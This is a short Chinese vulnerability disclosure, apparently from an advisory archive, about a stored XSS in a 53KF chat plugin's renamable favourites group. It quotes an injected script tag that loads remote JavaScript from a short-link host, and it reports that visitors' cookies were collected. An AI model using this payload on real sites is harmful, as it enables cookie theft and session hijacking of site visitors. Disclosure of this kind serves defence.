53KF某插件存储XSS跨站(华夏名网\59互联\7k7k等大量网站中枪)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 很牛逼很牛逼真的很牛逼,不信,你看 ### 详细说明: 53客服 某插件在网页右下角有个企业收藏夹 [<img src="https://images.seebug.org/upload/201501/121346230bd86d6ca271a18eb59908512c15d99d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121346230bd86d6ca271a18eb59908512c15d99d.png) 点开里面有个分组。 而这个分组到底是干什么的,怎么分配的。我现在也没弄清楚 但是它的分组名称是可修改的。 修改名称,插入代码 `test"><script src=http://is.gd/wnezNK></script>` [<img src="https://images.seebug.org/upload/201501/12140437807e140769049810ee11c8b9b407c953.png" alt="插入.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12140437807e140769049810ee11c8b9b407c953.png) 但是,审查元素去看代码。发现没有,失败了? [<img src="https://images.seebug.org/upload/201501/12140701883183593fdafdf9e1c8969f17c8abfe.png" alt="没有.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12140701883183593fdafdf9e1c8969f17c8abfe.png) 可是实际上我们已经收到cookie了。 [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息